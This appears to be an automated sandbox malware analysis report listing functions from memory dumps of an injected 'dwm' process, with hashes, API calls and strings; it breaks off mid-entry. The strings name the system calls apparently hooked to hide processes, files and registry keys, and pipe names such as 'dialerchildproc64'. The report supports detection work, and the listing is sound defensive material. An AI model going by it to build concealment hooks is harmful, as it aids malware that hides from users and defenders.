                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction ID: 2463c5b797d9bad466ecff0b9e84e309fb5b51cb3cd0fe10b501e93e457313a4
                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction Fuzzy Hash: 5E51823A205B8586EB50CF62E45836A77A1FB89FC9F048134DE5907B68DF3CC666C700

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                      • API String ID: 4175298099-1975688563
                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction ID: 497f9c739d475508feb68bcd3940ab8c19b0141bc7e9a6dd3358886a668f08c2
                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction Fuzzy Hash: 3731947C20794AA0EA54EBA5E8796D83321BF54F54FC1D1339C4A025629F38876FC390

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                      • API String ID: 190073905-1786718095
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: 9685692a26b48a1aa77a0e3d75b42b625413801992bd919d6816240a4d00a3ef
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: 0381BA2D70324286FA50EB66D47939922A0BF85F80F58C135AE4987797EF38CB778700

Control-flow Graph (graph image not reproduced in this export)
                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 00000283E0F4CE37
                                                                      • FlsGetValue.KERNEL32(?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CE4C
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CE6D
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CE9A
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CEAB
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CEBC
                                                                      • SetLastError.KERNEL32 ref: 00000283E0F4CED7
                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CF0D
                                                                      • FlsSetValue.KERNEL32(?,?,00000001,00000283E0F4ECCC,?,?,?,?,00000283E0F4BF9F,?,?,?,?,?,00000283E0F47AB0), ref: 00000283E0F4CF2C
                                                                        • Part of subcall function 00000283E0F4D6CC: HeapAlloc.KERNEL32 ref: 00000283E0F4D721
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CF54
                                                                        • Part of subcall function 00000283E0F4D744: HeapFree.KERNEL32 ref: 00000283E0F4D75A
                                                                        • Part of subcall function 00000283E0F4D744: GetLastError.KERNEL32 ref: 00000283E0F4D764
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CF65
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CF76
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast$Heap$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 570795689-0
                                                                      • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction ID: ef784ade3f8912ad7efddf794c5527fc649885eaec427ab5f0f5f1cdb9168253
                                                                      • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction Fuzzy Hash: 78417D3C20B24446FEA8E731557D36922427F84FB0F18D734AC3A476E6DE3886679790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2171963597-1373409510
                                                                      • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction ID: 385a2d083aaaa3e47a41796f20ea1cd22f5d4458295a7513b2f927fc2d45fa1d
                                                                      • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction Fuzzy Hash: B3215639615B4183FB50CB65F45836977A0FB85FA5F508225DE5903BA4CF3CC656CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction ID: 0ffee878b9830413a7d1f8b93794f1e626b482ba37576317c3903531effad528
                                                                      • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction Fuzzy Hash: CCE1D67A60A75086FB60DF65D49839D77A0FF45F98F108125EE8957B96CF34C2A2C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction ID: f0cd5769dceb19c785dc1d00fce1bd0c39f862e54687e6d70acd25c18d55f153
                                                                      • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction Fuzzy Hash: 23E1E63A60A74086EB60DF65D4A839D77A0FF45F98F108125EE8957B57CF38C2A2C780
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-537541572
                                                                      • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction ID: d6ad517a6998f1ef320dbc28867cd6c900c56690440f0ae9fd2c754d03fef244
                                                                      • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction Fuzzy Hash: 2941D43A31BA0091FE56CB66E8287562391BF49FE0F09C1359D1D97794EE3CCA6B8350
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction ID: cbe8385f6ed91e7dc4bb302cef295047aa815b055e2c8c646a9a3d24166777e0
                                                                      • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction Fuzzy Hash: C0416D37215B84C6EB60CF61E45879A77A5F788F98F048129DF8A07B58DF38C59ACB00
                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,00000283E0F4C7DE,?,?,?,?,?,?,?,?,00000283E0F4CF9D,?,?,00000001), ref: 00000283E0F4D087
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F4C7DE,?,?,?,?,?,?,?,?,00000283E0F4CF9D,?,?,00000001), ref: 00000283E0F4D0A6
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F4C7DE,?,?,?,?,?,?,?,?,00000283E0F4CF9D,?,?,00000001), ref: 00000283E0F4D0CE
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F4C7DE,?,?,?,?,?,?,?,?,00000283E0F4CF9D,?,?,00000001), ref: 00000283E0F4D0DF
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F4C7DE,?,?,?,?,?,?,?,?,00000283E0F4CF9D,?,?,00000001), ref: 00000283E0F4D0F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: 1%$Y%
                                                                      • API String ID: 3702945584-1395475152
                                                                      • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction ID: ade7066ce3a3ff758fac6fe570f80208f58c7e8a01b08e6c7ce4659e6d13c7e2
                                                                      • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction Fuzzy Hash: 0D114C3870E24441FA68E725697D36A72417F84FF0F18C334ACA9476EADE38C6638340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: 8c61c6d8054685d327fffbec9d36e1ce135c5da1a75d05695b230c3bc2c86dbb
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: C081A03CE0B74186FA50EB65A47D3996691BF85F80F58C4359D0887796EF38CB678700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction ID: 418e34784d5a447dd3c256712573709a6202cb3104d8d5a6fc7c68b9148e4065
                                                                      • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction Fuzzy Hash: 5D31D73931FA40E1EE71DB46A4287652394BF48FA0F598535DD2D0B794EF39C6678320
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction ID: 7a51c0677d45ef2d8e0f8e865b40ec92b9e3b9c247ce94acbb139c0e2b78fc90
                                                                      • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction Fuzzy Hash: B6118635711F4586EB50CB96F86831977A0FB88FE4F048234EE6A87795CF38CA258740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: dialer
                                                                      • API String ID: 756756679-3528709123
                                                                      • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction ID: 536a268e0e5e3639d0888a8f7f97f469e3674698813aefb5f4136be3c4b9bd04
                                                                      • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction Fuzzy Hash: 7A31D03A306B5182EB90CF56E56872967A0FF54F94F48C1309E4847B55EF34C6B6C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction ID: 154892d3e38e2f68da5f5246155fcb5eb63c7e71888735a220365c86bd7dd9c7
                                                                      • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction Fuzzy Hash: DE115C3820B24441FA64E725657D32D22427F84FB4F14C734AC76476DADE388A679340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction ID: 23decca88725c2b3b00bf0f5d8d34652aec515441ee14e667521a1a3eeed6bab
                                                                      • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction Fuzzy Hash: F9018C39306A4182FB50DB92A86C35963A1FB88FC4F888035DE5943755DF3CCA9AC700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction ID: a67bfcefeba7eb895c7c608116b79544e41d4809c8cb3b63860f3eb6848e847b
                                                                      • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction Fuzzy Hash: 02010579216B4582FF64DB62E82C31A63A0BF59F96F048434CD59077A5EF3DC62A8700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                      • Instruction ID: 321a2b3b388ed8ae64d17865d950159ced89eee023d1c0ba046b44844daa2799
                                                                      • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                      • Instruction Fuzzy Hash: 5551AF3A70E6028AEB24CB25E85CB593796FB84F88F14C534DE1647788EF35CA62C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction ID: d868a94041ba18b6d278cb3cf090a9628417af63207eabbc4d7a0bf3499e9ed8
                                                                      • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction Fuzzy Hash: AEF03C3630564192EB60CBA1E8A875A6761FB48FC8F848130DE4947A54DF3CCB9FCB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction ID: d6dac142fbb9f8630eee622a60a017c95142a55b6061ba0e5eb4aae9131604b1
                                                                      • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction Fuzzy Hash: 6AF06269216B0581EF10CB64E4AC3596320FF89F61F548239DE6A462E4DF3CCA66C340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction ID: 6aa765165a6bfee8af7352b26e05aa917e85148d459e8a900a09ba222e6ed986
                                                                      • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction Fuzzy Hash: 7DF08C2830AB8182FE54CB97B92C1196660BF48FD4F08C130EE5A07B18DF3CCAA78700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                      • Instruction ID: a67e98a6c6bbaff2d99db1ed57da5f7441afd0c011e62184b7e4e68d30db664a
                                                                      • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                      • Instruction Fuzzy Hash: 9E61E93A51EB48C6E760DB55E46831A77A0F788F85F108225EE8D47BA9DF7CC661CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 6f1f41e61fdfb75a22bfa71e0b8f61bac35eb3f29a569d0c45ebd88b0539823f
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 8611012AA42E5011FE2691E8D43D3650010FF68BFCF09C634AD3607AE68E34EEE34300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 3860899c575d735ffc7640441c4a4e9dca2ee44a3cfd435af13dbf794bcd07e5
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 9211A3AEA52A1311FA649528E47F36911C07F58B74F4CC639AD6E162D6CF38CBA34301
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                      • API String ID: 3215553584-4202648911
                                                                      • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction ID: cab4f1c358a123e86adfbdb896796ed04178d4609f07ce5fe4d3a3cab3bcc8d1
                                                                      • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction Fuzzy Hash: 0161A27E60224092F669CB64E57C32926A1BF45F50F54C435CE0A337A7DE38CB6B8700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 0ce9e477f8b28b00187c4e16db248bddc410558e9b5d9ea10c1edadac973804b
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: AD61703760AB54CAEB20DF65D49439D77A1FB44B88F048225EF4917B98DF38C666C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: fc89320dff4a40da580da1a3e5149ef6dae78b235dcb618a42e7cf795ac02eb3
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 1751AF7A1092908AEB74CF2694A835977A0FF54F94F18C125EE9947BD5CF38C6B2C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
